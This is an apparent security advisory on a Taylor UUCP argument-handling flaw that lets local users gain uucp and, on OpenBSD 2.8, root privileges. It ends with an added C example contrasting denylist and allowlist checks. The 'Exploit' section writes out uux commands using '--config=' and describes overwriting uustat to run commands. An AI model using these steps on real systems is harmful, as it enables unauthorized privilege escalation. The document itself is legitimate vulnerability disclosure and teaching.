******************* Brief description *************

Due to incorrect argument handling in a component of the Taylor UUCP
package, it is possible for local users to gain uid/gid uucp.

This may allow further elevation, depending on the system, up to and
including root access.

On OpenBSD 2.8 (and probably others) it allows root compromise. By
overwriting the uucp owned program /usr/bin/uustat, arbitrary commands
may be executed as part of the /etc/daily crontab script.

On Redhat 7.0 (and probably others) it allows creation of empty files as
root, and the ability to execute commands as if logged in at the console
(as checked via /lib/security/pam_console.so). This may also allow
further elevation of privileges, or denial of service.
(Tested against uucp-1.06.1-25)

Other systems running this package are also affected to a greater or
lesser degree.

*********************** Solution ******************

Patches should be available very soon, if not already, for most affected
systems.

If you do not require uucp functionality, you should remove the uucp
packages from your system.

********************** The Programs ***************

uux (1) - Remote command execution over UUCP
  If you specify an alternative configuration, it will run as the user
  that called it, and pass the same configuration to uuxqt.

uuxqt (1) - UUCP execution daemon
  Defaults to allowing rmail and uucp to be run, and nothing else, unless
  the configuration it is invoked with allows it to run other commands.

uucp (1) - Unix to Unix copy
  If you specify an alternate configuration, it will also run as the user
  that called it.

uuxqt checks the arguments for the programs it is asked to execute and
gets rid of what it thinks are the potentially dangerous ones. However,
it does not remove long arguments.

******************** The Exploit ******************

  uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will execute uucp, but will not use the /tmp/vv.v configuration file.
However,

  uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will use the supplied configuration, without dropping privileges.

1) Make a configuration file that allows any command to be executed, and
   allows files from anywhere to be copied to anywhere that is writable
   by uid/gid uucp. ( /tmp/config.uucp )

2) Make a command file with the command you want to be executed.
   ( /tmp/commands.uucp )

3) Do something like the following:

  $ THISHOST=`uuname -l`
  $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
  $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}

The commands in the /tmp/commands.uucp file will be executed by uuxqt,
with the uid/gid of uucp.

If you want to perform an exploit, and don't know what to put in the
files, you should read the documentation for uucp.

(Proof of concept root exploit for OpenBSD was performed on the wargame
running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )

-- zen-parse

===========================================================================
http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
'gone platinum'     = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
                    = and %73%6f%75%6e%64%73%20%6f%6b
===========================================================================
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parseat_private to a public forum it
may be redistributed as long as these conditions remain attached. If you
are mum or dad, this probably doesn't apply to you.
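
Added example, not part of the original advisory and not Taylor UUCP source: a simplified C model of the argument check described under "The Programs", showing why a filter keyed on the short option passes the long spelling while an allowlist of permitted flags rejects both. The function names, the allowed flags and the sample commands are assumptions made for illustration, and the model rejects a whole command instead of stripping arguments.

```c
#include <stdio.h>
#include <string.h>

/* Denylist model: knows only the short spelling of the config option. */
int denylist_ok(const char *arg)
{
    return strncmp(arg, "-I", 2) != 0;
}

/* Hypothetical policy: the only flags a queued uucp command may carry. */
static const char *const ALLOWED[] = { "-C", "-d", "-r", NULL };

/* Allowlist model: every option-shaped argument must match exactly. */
int allowlist_ok(const char *arg)
{
    size_t i;

    if (arg[0] != '-')
        return 1;                   /* operand such as a file name */
    for (i = 0; ALLOWED[i] != NULL; i++)
        if (strcmp(arg, ALLOWED[i]) == 0)
            return 1;
    return 0;                       /* -I..., --config=..., anything unlisted */
}

/* Returns 1 only if every argument after argv[0] passes the check. */
int command_ok(const char *const argv[], int (*check)(const char *))
{
    size_t i;

    for (i = 1; argv[i] != NULL; i++)
        if (!check(argv[i]))
            return 0;
    return 1;
}

/* Constructed samples: the advisory's two spellings plus a benign copy. */
const char *const CMD_SHORT[] = { "uucp", "-I/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile", NULL };
const char *const CMD_LONG[]  = { "uucp", "--config=/tmp/vv.v", "/tmp/somefile", "/tmp/someotherfile", NULL };
const char *const CMD_PLAIN[] = { "uucp", "-C", "/tmp/somefile", "/tmp/someotherfile", NULL };

int main(void)
{
    printf("denylist : short=%d long=%d plain=%d\n", command_ok(CMD_SHORT, denylist_ok),
           command_ok(CMD_LONG, denylist_ok), command_ok(CMD_PLAIN, denylist_ok));
    printf("allowlist: short=%d long=%d plain=%d\n", command_ok(CMD_SHORT, allowlist_ok),
           command_ok(CMD_LONG, allowlist_ok), command_ok(CMD_PLAIN, allowlist_ok));
    return 0;
}
```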